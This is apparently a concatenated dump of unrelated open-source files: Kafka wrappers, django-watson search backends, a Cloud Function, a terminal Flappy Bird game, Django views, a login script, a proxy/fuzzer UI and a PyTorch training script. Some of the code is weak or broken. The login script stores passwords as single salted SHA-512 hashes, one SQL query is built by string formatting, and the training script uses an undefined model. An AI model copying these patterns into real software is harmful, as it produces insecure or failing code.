parser.add_argument('-a', dest='auto_count', help='Automatically operate on latest files in BeamNG mods folder', metavar='N', type=int)
args = parser.parse_args()
if not(args.filepath or args.auto_count):
parser.error('Must select at least one option')
if args.filepath:
exportFix.fix_file(args.filepath)
if args.auto_count:
for file in get_files.get_files_sorted()[:args.auto_count]:
exportFix.fix_file(file)
``` |
{
"source": "jon-perrett/f1-2021-tools",
"score": 3
} |
#### File: f1-2021-tools/kafka/kafka_consumer.py
```python
import logging
from confluent_kafka import Consumer
class KafkaConsumer:
"""Wrapper class for commonly used Kafka consumer methods"""
def __init__(self, config, subscriptions):
self.consumer = Consumer(config)
self.consumer.subscribe(subscriptions)
def get_messages(self):
"""Prints messages on subscribed topics"""
while True:
msg = self.consumer.poll(1.0)
if msg is None:
continue
if msg.error():
logging.error("Consumer error: {}".format(msg.error()))
continue
print("Received message: {}".format(msg.value().decode("utf-8")))
def close_consumer(self):
self.consumer.close()
```
#### File: f1-2021-tools/kafka/kafka_producer.py
```python
import logging
from confluent_kafka import Producer
import json
class KafkaProducer:
"""Wrapper class for Kafka producer, to provide easy interface to commonly used methods"""
def __init__(self, config):
self.producer = Producer(config)
self.config = config
@staticmethod
def delivery_report(err, msg):
"""Called once for each message produced to indicate delivery result.
Triggered by poll() or flush()."""
if err is not None:
logging.info("Message delivery failed: {}".format(err))
else:
logging.info(
"Message delivered to {} [{}]".format(msg.topic(), msg.partition())
)
def produce_data(self, topic: str, message: dict):
# Trigger any available delivery report callbacks from previous produce() calls
self.producer.poll(0)
# Asynchronously produce a message, the delivery report callback
# will be triggered from poll() above, or flush() below, when the message has
# been successfully delivered or failed permanently.
self.producer.produce(
topic,
json.dumps(message),  # serialize the message dict to a JSON string
callback=self.delivery_report,
)
# Wait for any outstanding messages to be delivered and delivery report
# callbacks to be triggered.
self.producer.flush()
``` |
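A minimal sketch wiring the two wrappers together, assuming both modules are on the import path and confluent-kafka is installed; the broker address, topic and group id below are placeholders:
```python
# Illustrative only - connection details are placeholders.
from kafka_producer import KafkaProducer
from kafka_consumer import KafkaConsumer

config = {"bootstrap.servers": "localhost:9092"}

producer = KafkaProducer(config)
producer.produce_data("telemetry", {"lap": 1, "speed_kph": 287})

consumer = KafkaConsumer({**config, "group.id": "f1-tools", "auto.offset.reset": "earliest"},
                         ["telemetry"])
consumer.get_messages()  # blocks, printing messages as they arrive
```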
{
"source": "jonperron/django-watson",
"score": 3
} |
#### File: django-watson/watson/backends.py
```python
from __future__ import unicode_literals
import abc
import re
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.db import transaction, connections, router
from django.db.models import Q
from django.utils.encoding import force_text
from django.utils import six
from watson.models import SearchEntry, has_int_pk
def regex_from_word(word):
"""Generates a regext from the given search word."""
return "(\s{word})|(^{word})".format(
word=re.escape(word),
)
# PostgreSQL to_tsquery operators: ! & : ( ) |
RE_POSTGRES_ESCAPE_CHARS = re.compile(r'[&:(|)!><]', re.UNICODE)
# MySQL boolean full-text search operators: > < ( ) " ~ * + -
RE_MYSQL_ESCAPE_CHARS = re.compile(r'["()><~*+-]', re.UNICODE)
RE_SPACE = re.compile(r"[\s]+", re.UNICODE)
def escape_query(text, re_escape_chars):
"""
normalizes the query text to a format that can be consumed
by the backend database
"""
text = force_text(text)
text = RE_SPACE.sub(" ", text) # Standardize spacing.
text = re_escape_chars.sub(" ", text) # Replace harmful characters with space.
text = text.strip()
return text
class SearchBackend(six.with_metaclass(abc.ABCMeta)):
"""Base class for all search backends."""
def is_installed(self):
"""Checks whether django-watson is installed."""
return True
def do_install(self):
"""Executes the SQL needed to install django-watson."""
pass
def do_uninstall(self):
"""Executes the SQL needed to uninstall django-watson."""
pass
requires_installation = False
supports_ranking = False
supports_prefix_matching = False
def do_search_ranking(self, engine_slug, queryset, search_text):
"""Ranks the given queryset according to the relevance of the given search text."""
return queryset.extra(
select={
"watson_rank": "1",
},
)
@abc.abstractmethod
def do_search(self, engine_slug, queryset, search_text):
"""Filters the given queryset according the the search logic for this backend."""
raise NotImplementedError
def do_filter_ranking(self, engine_slug, queryset, search_text):
"""Ranks the given queryset according to the relevance of the given search text."""
return queryset.extra(
select={
"watson_rank": "1",
},
)
@abc.abstractmethod
def do_filter(self, engine_slug, queryset, search_text):
"""Filters the given queryset according the the search logic for this backend."""
raise NotImplementedError
def do_string_cast(self, connection, column_name):
"""Casts the given column name to string."""
return connection.ops.quote_name(column_name)
class RegexSearchMixin(six.with_metaclass(abc.ABCMeta)):
"""Mixin to adding regex search to a search backend."""
supports_prefix_matching = True
def do_search(self, engine_slug, queryset, search_text):
"""Filters the given queryset according the the search logic for this backend."""
word_query = Q()
for word in search_text.split():
regex = regex_from_word(word)
word_query &= (Q(title__iregex=regex) | Q(description__iregex=regex) | Q(content__iregex=regex))
return queryset.filter(
word_query
)
def do_filter(self, engine_slug, queryset, search_text):
"""Filters the given queryset according the the search logic for this backend."""
model = queryset.model
connection = connections[queryset.db]
db_table = connection.ops.quote_name(SearchEntry._meta.db_table)
model_db_table = connection.ops.quote_name(model._meta.db_table)
pk = model._meta.pk
id = connection.ops.quote_name(pk.db_column or pk.attname)
# Add in basic filters.
word_query = ["""
({db_table}.{engine_slug} = %s)
""", """
({db_table}.{content_type_id} = %s)
"""]
word_kwargs = {
"db_table": db_table,
"model_db_table": model_db_table,
"engine_slug": connection.ops.quote_name("engine_slug"),
"title": connection.ops.quote_name("title"),
"description": connection.ops.quote_name("description"),
"content": connection.ops.quote_name("content"),
"content_type_id": connection.ops.quote_name("content_type_id"),
"object_id": connection.ops.quote_name("object_id"),
"object_id_int": connection.ops.quote_name("object_id_int"),
"id": id,
"iregex_operator": connection.operators["iregex"],
}
word_args = [
engine_slug,
ContentType.objects.get_for_model(model).id,
]
# Add in join.
if has_int_pk(model):
word_query.append("""
({db_table}.{object_id_int} = {model_db_table}.{id})
""")
else:
word_query.append("""
({db_table}.{object_id} = {model_db_table}.{id})
""")
# Add in all words.
for word in search_text.split():
regex = regex_from_word(word)
word_query.append(
"""
({db_table}.{title} {iregex_operator}
OR {db_table}.{description} {iregex_operator}
OR {db_table}.{content} {iregex_operator})
"""
)
word_args.extend((regex, regex, regex))
# Compile the query.
full_word_query = " AND ".join(word_query).format(**word_kwargs)
return queryset.extra(
tables=(db_table,),
where=(full_word_query,),
params=word_args,
)
class RegexSearchBackend(RegexSearchMixin, SearchBackend):
"""A search backend that works with SQLite3."""
class PostgresSearchBackend(SearchBackend):
"""A search backend that uses native PostgreSQL full text indices."""
search_config = getattr(settings, "WATSON_POSTGRES_SEARCH_CONFIG", "pg_catalog.english")
"""Text search configuration to use in `to_tsvector` and `to_tsquery` functions"""
def escape_postgres_query(self, text):
"""Escapes the given text to become a valid ts_query."""
return " & ".join(
"$${0}$$:*".format(word)
for word
in escape_query(text, RE_POSTGRES_ESCAPE_CHARS).split()
)
def is_installed(self, schema_name="public"):
"""Checks whether django-watson is installed."""
connection = connections[router.db_for_read(SearchEntry)]
cursor = connection.cursor()
cursor.execute("""
SELECT oid FROM pg_namespace WHERE nspname = '{schema_name}'
""".format(schema_name=schema_name))
relnamespaceid = cursor.fetchone()[0]
cursor.execute("""
SELECT attname FROM pg_attribute
WHERE attrelid = (SELECT oid FROM pg_class WHERE relname = 'watson_searchentry' AND relnamespace = '{relnamespaceid}') AND attname = 'search_tsv';
""".format(relnamespaceid=relnamespaceid))
return bool(cursor.fetchall())
@transaction.atomic()
def do_install(self):
"""Executes the PostgreSQL specific SQL code to install django-watson."""
connection = connections[router.db_for_write(SearchEntry)]
connection.cursor().execute("""
-- Ensure that plpgsql is installed.
CREATE OR REPLACE FUNCTION make_plpgsql() RETURNS VOID LANGUAGE SQL AS
$$
CREATE LANGUAGE plpgsql;
$$;
SELECT
CASE
WHEN EXISTS(
SELECT 1
FROM pg_catalog.pg_language
WHERE lanname='plpgsql'
)
THEN NULL
ELSE make_plpgsql() END;
DROP FUNCTION make_plpgsql();
-- Create the search index.
ALTER TABLE watson_searchentry ADD COLUMN search_tsv tsvector NOT NULL;
CREATE INDEX watson_searchentry_search_tsv ON watson_searchentry USING gin(search_tsv);
-- Create the trigger function.
CREATE OR REPLACE FUNCTION watson_searchentry_trigger_handler() RETURNS trigger AS $$
begin
new.search_tsv :=
setweight(to_tsvector('{search_config}', coalesce(new.title, '')), 'A') ||
setweight(to_tsvector('{search_config}', coalesce(new.description, '')), 'C') ||
setweight(to_tsvector('{search_config}', coalesce(new.content, '')), 'D');
return new;
end
$$ LANGUAGE plpgsql;
CREATE TRIGGER watson_searchentry_trigger BEFORE INSERT OR UPDATE
ON watson_searchentry FOR EACH ROW EXECUTE PROCEDURE watson_searchentry_trigger_handler();
""".format(
search_config=self.search_config
))
@transaction.atomic()
def do_uninstall(self):
"""Executes the PostgreSQL specific SQL code to uninstall django-watson."""
connection = connections[router.db_for_write(SearchEntry)]
connection.cursor().execute("""
ALTER TABLE watson_searchentry DROP COLUMN search_tsv;
DROP TRIGGER watson_searchentry_trigger ON watson_searchentry;
DROP FUNCTION watson_searchentry_trigger_handler();
""")
requires_installation = True
supports_ranking = True
supports_prefix_matching = True
def do_search(self, engine_slug, queryset, search_text):
"""Performs the full text search."""
return queryset.extra(
where=("search_tsv @@ to_tsquery('{search_config}', %s)".format(
search_config=self.search_config
),),
params=(self.escape_postgres_query(search_text),),
)
def do_search_ranking(self, engine_slug, queryset, search_text):
"""Performs full text ranking."""
return queryset.extra(
select={
"watson_rank": "ts_rank_cd(watson_searchentry.search_tsv, to_tsquery('{search_config}', %s))".format(
search_config=self.search_config
),
},
select_params=(self.escape_postgres_query(search_text),),
order_by=("-watson_rank",),
)
def do_filter(self, engine_slug, queryset, search_text):
"""Performs the full text filter."""
model = queryset.model
content_type = ContentType.objects.get_for_model(model)
connection = connections[queryset.db]
pk = model._meta.pk
if has_int_pk(model):
ref_name = "object_id_int"
ref_name_typecast = ""
else:
ref_name = "object_id"
# Cast to text to make join work with uuid columns
ref_name_typecast = "::text"
return queryset.extra(
tables=("watson_searchentry",),
where=(
"watson_searchentry.engine_slug = %s",
"watson_searchentry.search_tsv @@ to_tsquery('{search_config}', %s)".format(
search_config=self.search_config
),
"watson_searchentry.{ref_name} = {table_name}.{pk_name}{ref_name_typecast}".format(
ref_name=ref_name,
table_name=connection.ops.quote_name(model._meta.db_table),
pk_name=connection.ops.quote_name(pk.db_column or pk.attname),
ref_name_typecast=ref_name_typecast
),
"watson_searchentry.content_type_id = %s"
),
params=(engine_slug, self.escape_postgres_query(search_text), content_type.id),
)
def do_filter_ranking(self, engine_slug, queryset, search_text):
"""Performs the full text ranking."""
return queryset.extra(
select={
"watson_rank": "ts_rank_cd(watson_searchentry.search_tsv, to_tsquery('{search_config}', %s))".format(
search_config=self.search_config
),
},
select_params=(self.escape_postgres_query(search_text),),
order_by=("-watson_rank",),
)
def do_string_cast(self, connection, column_name):
return "{column_name}::text".format(
column_name=connection.ops.quote_name(column_name),
)
class PostgresLegacySearchBackend(PostgresSearchBackend):
"""
A search backend that uses native PostgreSQL full text indices.
This backend doesn't support prefix matching, and works with PostgreSQL 8.3 and below.
"""
supports_prefix_matching = False
def escape_postgres_query(self, text):
"""Escapes the given text to become a valid ts_query."""
return " & ".join(
"$${0}$$".format(word)
for word
in escape_query(text, RE_POSTGRES_ESCAPE_CHARS).split()
)
class PostgresPrefixLegacySearchBackend(RegexSearchMixin, PostgresLegacySearchBackend):
"""
A legacy search backend that uses a regexp to perform matches, but still allows
relevance rankings.
Use if your Postgres version is less than 8.3, and you absolutely can't live without
prefix matching. Beware, this backend can get slow with large datasets!
"""
def escape_mysql_boolean_query(search_text):
return " ".join(
'+{word}*'.format(
word=word,
)
for word in escape_query(search_text, RE_MYSQL_ESCAPE_CHARS).split()
)
class MySQLSearchBackend(SearchBackend):
def is_installed(self):
"""Checks whether django-watson is installed."""
connection = connections[router.db_for_read(SearchEntry)]
cursor = connection.cursor()
cursor.execute("SHOW INDEX FROM watson_searchentry WHERE Key_name = 'watson_searchentry_fulltext'")
return bool(cursor.fetchall())
def do_install(self):
"""Executes the MySQL specific SQL code to install django-watson."""
connection = connections[router.db_for_write(SearchEntry)]
cursor = connection.cursor()
# Drop all foreign keys on the watson_searchentry table.
cursor.execute(
"SELECT CONSTRAINT_NAME FROM information_schema.TABLE_CONSTRAINTS "
"WHERE CONSTRAINT_SCHEMA = DATABASE() "
"AND TABLE_NAME = 'watson_searchentry' "
"AND CONSTRAINT_TYPE = 'FOREIGN KEY'"
)
for constraint_name, in cursor.fetchall():
cursor.execute(
"ALTER TABLE watson_searchentry DROP FOREIGN KEY {constraint_name}".format(
constraint_name=constraint_name,
)
)
# Change the storage engine to MyISAM.
cursor.execute("ALTER TABLE watson_searchentry ENGINE = MyISAM")
# Add the full text indexes.
cursor.execute("CREATE FULLTEXT INDEX watson_searchentry_fulltext "
"ON watson_searchentry (title, description, content)")
cursor.execute("CREATE FULLTEXT INDEX watson_searchentry_title "
"ON watson_searchentry (title)")
cursor.execute("CREATE FULLTEXT INDEX watson_searchentry_description "
"ON watson_searchentry (description)")
cursor.execute("CREATE FULLTEXT INDEX watson_searchentry_content "
"ON watson_searchentry (content)")
def do_uninstall(self):
"""Executes the SQL needed to uninstall django-watson."""
connection = connections[router.db_for_write(SearchEntry)]
cursor = connection.cursor()
# Destroy the full text indexes.
cursor.execute("DROP INDEX watson_searchentry_fulltext ON watson_searchentry")
cursor.execute("DROP INDEX watson_searchentry_title ON watson_searchentry")
cursor.execute("DROP INDEX watson_searchentry_description ON watson_searchentry")
cursor.execute("DROP INDEX watson_searchentry_content ON watson_searchentry")
supports_prefix_matching = True
requires_installation = True
supports_ranking = True
def _format_query(self, search_text):
return escape_mysql_boolean_query(search_text)
def do_search(self, engine_slug, queryset, search_text):
"""Performs the full text search."""
return queryset.extra(
where=("MATCH (title, description, content) AGAINST (%s IN BOOLEAN MODE)",),
params=(self._format_query(search_text),),
)
def do_search_ranking(self, engine_slug, queryset, search_text):
"""Performs full text ranking."""
search_text = self._format_query(search_text)
return queryset.extra(
select={
"watson_rank": """
((MATCH (title) AGAINST (%s IN BOOLEAN MODE)) * 3) +
((MATCH (description) AGAINST (%s IN BOOLEAN MODE)) * 2) +
((MATCH (content) AGAINST (%s IN BOOLEAN MODE)) * 1)
""",
},
select_params=(search_text, search_text, search_text,),
order_by=("-watson_rank",),
)
def do_filter(self, engine_slug, queryset, search_text):
"""Performs the full text filter."""
model = queryset.model
content_type = ContentType.objects.get_for_model(model)
connection = connections[queryset.db]
pk = model._meta.pk
if has_int_pk(model):
ref_name = "object_id_int"
else:
ref_name = "object_id"
return queryset.extra(
tables=("watson_searchentry",),
where=(
"watson_searchentry.engine_slug = %s",
"MATCH (watson_searchentry.title, watson_searchentry.description, watson_searchentry.content) "
"AGAINST (%s IN BOOLEAN MODE)",
"watson_searchentry.{ref_name} = {table_name}.{pk_name}".format(
ref_name=ref_name,
table_name=connection.ops.quote_name(model._meta.db_table),
pk_name=connection.ops.quote_name(pk.db_column or pk.attname),
),
"watson_searchentry.content_type_id = %s",
),
params=(engine_slug, self._format_query(search_text), content_type.id),
)
def do_filter_ranking(self, engine_slug, queryset, search_text):
"""Performs the full text ranking."""
search_text = self._format_query(search_text)
return queryset.extra(
select={
"watson_rank": """
((MATCH (watson_searchentry.title) AGAINST (%s IN BOOLEAN MODE)) * 3) +
((MATCH (watson_searchentry.description) AGAINST (%s IN BOOLEAN MODE)) * 2) +
((MATCH (watson_searchentry.content) AGAINST (%s IN BOOLEAN MODE)) * 1)
""",
},
select_params=(search_text, search_text, search_text,),
order_by=("-watson_rank",),
)
def get_postgresql_version(connection):
"""Returns the version number of the PostgreSQL connection."""
from django.db.backends.postgresql_psycopg2.version import get_version
return get_version(connection)
class AdaptiveSearchBackend(SearchBackend):
"""
A search backend that guesses the correct search backend based on the
DATABASES["default"] settings.
"""
def __new__(cls):
"""Guess the correct search backend and initialize it."""
connection = connections[router.db_for_read(SearchEntry)]
if connection.vendor == "postgresql":
version = get_postgresql_version(connection)
if version > 80400:
return PostgresSearchBackend()
if version > 80300:
return PostgresLegacySearchBackend()
if connection.vendor == "mysql":
return MySQLSearchBackend()
return RegexSearchBackend()
``` |
{
"source": "jonpeters/google-cloud-ref-impl",
"score": 3
} |
#### File: cloud-functions/http-handler/main.py
```python
from flask import Request, Response
import json
from db import db
from concurrent import futures
from google.cloud import pubsub_v1
from typing import Callable, List
import os
import functions_framework
import debug
@functions_framework.http
def entry_point(request: Request):
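    # GET returns all item names as a JSON list; POST publishes the raw
    # request body to the configured Pub/Sub topic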
method = request.method.upper()
with db.connect() as conn:
if method == "GET":
results = conn.execute("SELECT name FROM items").fetchall()
results = [result[0] for result in results]
return Response(json.dumps(results), status=200)
elif method == "POST":
publish([request.data.decode("UTF-8")])
return Response(status=200)
def publish(messages: List[str]):
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(
os.getenv("GCP_PROJECT"), os.getenv("TOPIC_ID"))
publish_futures = []
def get_callback(
publish_future: pubsub_v1.publisher.futures.Future, data: str
) -> Callable[[pubsub_v1.publisher.futures.Future], None]:
def callback(publish_future: pubsub_v1.publisher.futures.Future) -> None:
try:
# Wait 60 seconds for the publish call to succeed.
print(publish_future.result(timeout=60))
except futures.TimeoutError:
print(f"Publishing {data} timed out.")
return callback
for message in messages:
# When you publish a message, the client returns a future.
publish_future = publisher.publish(topic_path, message.encode("utf-8"))
# Non-blocking. Publish failures are handled in the callback function.
publish_future.add_done_callback(get_callback(publish_future, message))
publish_futures.append(publish_future)
# Wait for all the publish futures to resolve before exiting.
futures.wait(publish_futures, return_when=futures.ALL_COMPLETED)
``` |
{
"source": "JonPizza/crappybird-py",
"score": 3
} |
#### File: JonPizza/crappybird-py/main.py
```python
import curses
from curses import wrapper
import time
import random
class Birdie:
def __init__(self, y=5, downward_accl=0):
self.y = y
self.downward_accl = downward_accl # downward acceleration
def flap(self):
self.y -= 1
self.downward_accl = -2
def update(self, counter):
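        # simple gravity model: every other frame the bird drops by
        # (1 + downward_accl) rows, and every 10th frame the downward
        # acceleration grows by one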
if counter % 2 == 0:
self.y += 1 + self.downward_accl
if counter % 10 == 0:
self.downward_accl += 1
def draw(self, stdscr):
stdscr.addstr(self.y, 20, '>', curses.color_pair(2))
stdscr.refresh()
class Pipe:
def __init__(self, x=78, opening=None):
if opening:
self.opening = opening
else:
self.opening = random.randint(2, 13)
self.x = x
def update(self):
self.x -= 1
def draw(self, stdscr):
for i in range(24):
if i not in [i for i in range(self.opening, self.opening+7)]:
stdscr.addstr(i, self.x, '█')
stdscr.refresh()
def karl_within(self, karl: Birdie):
locations = []
for i in range(24):
if i not in [i for i in range(self.opening, self.opening+7)]:
locations.append([i, self.x])
return [karl.y, 20] in locations
def karl_passing(self, karl: Birdie):
locations = []
for i in range(24):
if i in [i for i in range(self.opening, self.opening+7)]:
locations.append([i, self.x])
return [karl.y, 20] in locations
def main(stdscr):
karl = Birdie()
pipes = []
counter = 0
points = 0
curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLUE)
curses.init_pair(2, curses.COLOR_YELLOW, curses.COLOR_RED)
curses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_BLACK)
curses.init_pair(4, curses.COLOR_YELLOW, curses.COLOR_YELLOW)
stdscr.bkgd(' ', curses.color_pair(1) | curses.A_BOLD)
stdscr.nodelay(True)
curses.curs_set(0)
while True:
if points == 35:
# change to HELL MODE
curses.init_pair(1, curses.COLOR_MAGENTA, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_RED, curses.COLOR_YELLOW)
curses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_BLACK)
stdscr.erase()
k = stdscr.getch()
if k == ord(' '):
karl.flap()
karl.update(counter)
try: # throws error if karl is outside of stdscr
karl.draw(stdscr)
except:
return points
for pipe in pipes:
if pipe.x >= 0:
pipe.draw(stdscr)
pipe.update()
if pipe.karl_within(karl):
return points
if pipe.karl_passing(karl):
points += 1
        # prune pipes that have scrolled off-screen so the list does not grow forever
        pipes = [pipe for pipe in pipes if pipe.x >= 0]
if counter % 40 == 0:
pipes.append(Pipe())
stdscr.addstr(0, 0, f'Points: {points}', curses.color_pair(3))
stdscr.addstr(23, 0, '█'*79, curses.color_pair(4))
stdscr.refresh()
counter += 1
time.sleep(0.04)
def death_message(points):
if points == 0:
print('What\'s wrong with you?? Eh??')
elif points < 10:
print('That\'s all you got!?')
elif points < 30:
print('You\'re getting a little better...')
elif points < 50:
print('Wowza! That\'s pretty darn good!')
else:
print('You must be a hacker.')
if __name__ == '__main__':
points = wrapper(main)
print(f'Points: {points}')
death_message(points)
# https://jon.network
``` |
{
"source": "JonPizza/Django-Blog",
"score": 2
} |
#### File: Django-Blog/posts/views.py
```python
from django.shortcuts import render
from .models import Post
def get_ctfs():
return [p.catagory for p in Post.objects.all()[::-1]][:5]
def index(request):
return render(request, 'index.html', {'posts': Post.objects.all(), 'ctfs': get_ctfs()})
def filter_for_ctf(request, ctf):
return render(request, 'index.html', {'posts': Post.objects.filter(catagory__iexact=ctf), 'ctfs': get_ctfs()})
def get_post(request, ctf, pk):
return render(request, 'post.html', {'p': Post.objects.get(pk=pk), 'ctfs': get_ctfs()})
``` |
{
"source": "JonPizza/py-login-system",
"score": 3
} |
#### File: JonPizza/py-login-system/create_acct.py
```python
from random import randint
import hashlib, time
start_time = time.time()
def sha512(data):
return hashlib.sha512(data.encode('utf-8')).hexdigest()
chars = 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890!@#%^&*()' # Everything that's not '$'
invalid_creds = False
username = input('Username: ')
user_pass = input('Password: ')
print('\n'*100)
with open('users.txt', 'r') as users:
#Make sure no one has used the username before
file_content = users.read().split('\n')
usernames = []
for i in file_content:
usernames.append(i.split('$')[0])
if username in usernames:
invalid_creds = True
if not invalid_creds:
print('Creating Account...')
salt = ''.join([chars[randint(0, len(chars)-1)] for x in range(8)]) #8 long rand chars
with open('users.txt', 'a') as users:
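        # each record is stored as "username$sha512(password + salt)$salt", one per line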
users.write(username + '$' + sha512(user_pass + salt) + '$' + salt +'\n')
print(f'Done. Time Elapsed: {time.time()-start_time}')
else:
    print('Someone has already taken that username.')
``` |
{
"source": "JonPizza/sneeze",
"score": 3
} |
#### File: sneeze/attacker/positions.py
```python
import curses
import os
def handle_keystroke(action, screen, http_log):
if action.lower() == 'e':
editor = http_log.config['editor']['editor']
screen.stop()
os.system(f'{editor} {http_log.config_file}')
screen.run(http_log)
def edit_positions(screen, action, http_log):
screen.bottom_msg = '<e> - Edit | <l> - Launch | <p> - Switch Pos/Pay | Fuzzing on %FUZZ%'
stdscr = screen.stdscr
height, width = stdscr.getmaxyx()
handle_keystroke(action, screen, http_log)
y = 4
for line in screen.attacking_req.rstrip().split('\n'):
try:
stdscr.addstr(y, 1, trunc(line, width))
except:
stdscr.addstr(y - 2, 1, '-- TRUNCATED --')
break
y += 1
```
#### File: sneeze/sneeze/logging.py
```python
from proxy.proxy import Request, Response
import configparser
import time
class Logger:
def __init__(self, config_file):
self.config_file = config_file
self.config = configparser.ConfigParser()
self.config.read(self.config_file)
self.save_file = self.config['save']['save_file']
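        # token1 and token2 are sentinel strings that delimit logged
        # request/response pairs in the save file (see append_req_res / read)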
        self.token1 = '<KEY>&#MAb~y<ry 3$WSMc0=g$QXHw`6H<OwF0cY)_v<k+gb-rKT&\n'
        self.token2 = '<KEY>&#MAb~y<ry.3$mmmmmmmmAjs#@I(eifd++Y)redditfunny&\n'
def append_req_res(self, req, res):
with open(self.save_file, 'a') as f:
f.write(req + self.token2 + res + self.token1)
def clear(self):
with open(self.save_file, 'w') as f:
f.write('')
def shorten(self, max_pairs=50):
log = self.read()
if len(log) >= max_pairs:
self.clear()
for i in range(0, max_pairs)[::-1]:
self.append_req_res(log[i]['req'], log[i]['res'])
def reload_config(self):
self.config.read(self.config_file)
def read(self):
req_and_res = []
with open(self.save_file) as f:
for r in f.read().split(self.token1):
if r == '':
continue
r = r.split(self.token2)
req_and_res.append({
'req': Request(r[0]),
'res': Response(r[1]),
})
return req_and_res
```
#### File: sneeze/sneeze/screen.py
```python
import curses
from curses import wrapper
import time
from .history import history
from .edit_settings import edit_settings
from .edit_http import edit_req, edit_res
class Screen:
def __init__(self):
self.tabs = ['Proxy', 'Editor', 'Attacker']
self.selected_tab = 0
self.sub_tabs = {
'Proxy': ['History', 'Settings'],
'Editor': ['Request', 'Response'],
'Attacker': ['Payloads', 'Positions'],
}
self.selected_sub_tab = 0
self.selected_row = 1
self.window = 0
self.running = True
self.main_funcs = {
'History': history,
'Settings': edit_settings,
'Request': edit_req,
'Response': edit_res,
}
self.selected_req = 0
self.editing_req_num = 0
self.editing_req = ''
self.editing_res = ''
self.attacking_req = ''
self.bottom_msg = 'Welcome to Sneeze!'
def setup(self):
curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_YELLOW)
curses.init_pair(2, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(3, curses.COLOR_WHITE, curses.COLOR_BLACK)
curses.init_pair(4, curses.COLOR_BLACK, curses.COLOR_CYAN)
self.colors = {
'highlight': curses.color_pair(1),
'invert': curses.color_pair(2),
'normal': curses.color_pair(3),
'selected': curses.color_pair(4),
}
curses.curs_set(0)
def draw(self, stdscr):
self.stdscr = stdscr
height, width = stdscr.getmaxyx()
self.clear(height, width)
self.setup()
while True:
if not self.running:
break
height, width = stdscr.getmaxyx()
self.clear_window1(height, width)
main = self.main_funcs[self.sub_tabs[self.tabs[self.selected_tab % len(self.sub_tabs)]][self.selected_sub_tab % 2]]
main(self, '', self.log)
self.draw_banner(width)
if self.window == 0:
self.bottom_msg = '<space> - Switch windows | <arrow keys> - Switch tabs'
self.draw_bottom_msg(height, width)
self.draw_tabs(self.tabs, self.selected_tab, 1, width)
self.draw_tabs(self.sub_tabs[self.tabs[self.selected_tab % len(self.sub_tabs)]], self.selected_sub_tab, 2, width)
self.draw_seperator(width, 3)
action = stdscr.getkey()
self.handle_tab_movement(action)
if self.window == 1:
main(self, action, self.log)
stdscr.refresh()
def clear_window1(self, height, width):
for i in range(4, height - 1):
self.stdscr.addstr(i, 0, ' ' * width)
self.stdscr.addstr(height - 1, 0, ' ' * (width - 1))
def clear(self, height, width):
for i in range(height - 1):
self.stdscr.addstr(i, 0, ' ' * width)
def draw_banner(self, width):
self.stdscr.addstr(0, 0, ' Sneeze v1.0.0' + ' ' * (width - 26) + 'By JonPizza ', self.colors['highlight'])
def draw_bottom_msg(self, height, width):
self.stdscr.addstr(height - 1, 0, ' ' + self.bottom_msg + ' ' * (width - len(self.bottom_msg) - 2), self.colors['invert'])
def handle_tab_movement(self, action):
if action == ' ':
if self.window == 1:
self.window = 0
else:
self.window = 1
if self.window == 1:
return
if action == 'KEY_RIGHT':
if self.selected_row == 1:
self.selected_tab += 1
else:
self.selected_sub_tab += 1
elif action == 'KEY_LEFT':
if self.selected_row == 1:
self.selected_tab -= 1
else:
self.selected_sub_tab -= 1
elif action == 'KEY_DOWN':
if self.selected_row == 1:
self.selected_row = 2
elif action == 'KEY_UP':
if self.selected_row == 2:
self.selected_row = 1
def draw_tabs(self, tabs, selected, y, width):
self.stdscr.addstr(y, 0, ' ' * width)
x = 2
if 1 == self.window:
self.stdscr.addstr(1, 0, '▼')
self.stdscr.addstr(2, 0, '▼')
elif 1 == self.selected_row:
self.stdscr.addstr(1, 0, '➞')
self.stdscr.addstr(2, 0, ' ')
else:
self.stdscr.addstr(2, 0, '➞')
self.stdscr.addstr(1, 0, ' ')
for tab in tabs:
if tab != tabs[abs(selected) % len(tabs)]:
self.stdscr.addstr(y, x, f' {tab} ', self.colors['invert'])
else:
self.stdscr.addstr(y, x, f' {tab} ', self.colors['selected'])
x += len(tab) + 4
def draw_seperator(self, width, y):
self.stdscr.addstr(y, 0, '«' * width)
def stop(self):
self.running = False
curses.endwin()
def run(self, log):
self.log = log
self.running = True
wrapper(self.draw)
if __name__ == '__main__':
screen = Screen()
screen.run()
``` |
{
"source": "jonpodtu/jonpo_02476",
"score": 3
} |
#### File: src/models/train_model.py
```python
import os
import hydra
import matplotlib.pyplot as plt
import torch
from hydra.utils import to_absolute_path
from model import MyAwesomeModel
from omegaconf import DictConfig
from torch import optim
from torch.utils.data import DataLoader, TensorDataset
@hydra.main(config_path="config", config_name="training_conf.yaml")
def main(cfg: DictConfig):
print("Training day and night...")
trainset = TensorDataset(
torch.load(to_absolute_path(cfg.paths["images"])),
torch.load(to_absolute_path(cfg.paths["labels"])),
)
train_set = DataLoader(
trainset, batch_size=cfg.hyperparameters["batch_size"], shuffle=True
)
print("The trainingset is {} long!".format(len(trainset)))
# Criterion: We use the negative log likelihood as our output is logSoftMax
criterion = torch.nn.NLLLoss()
if cfg.hyperparameters["optimizer"].lower() == "adam":
optimizer = optim.Adam(model.parameters(), lr=cfg.hyperparameters["lr"])
elif cfg.hyperparameters["optimizer"].lower() == "sgd":
optimizer = optim.SGD(model.parameters(), lr=cfg.hyperparameters["lr"])
else:
        raise ValueError('Not a valid optimizer! Please choose "adam" or "sgd".')
# Epochs and train_loss
epochs = cfg.hyperparameters["epochs"]
train_loss = []
for e in range(epochs):
# Dropout should be one ie. we set model to training mode
model.train()
running_loss = 0
"""
The for-loop does the following:
We use convolutional network, so first we unsqueeze
Resets the gradients
1. Makes a forward pass through the network
2. Use the logits to calculate the loss. We use the computed
logits from our output.
3. Perform a backward pass through the network with
loss.backward() to calculate the gradients
4. Take a step with the optimizer to update the weights
"""
for images, labels in train_set:
images = images.unsqueeze(1)
optimizer.zero_grad()
output = model(images)
loss = criterion(output, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
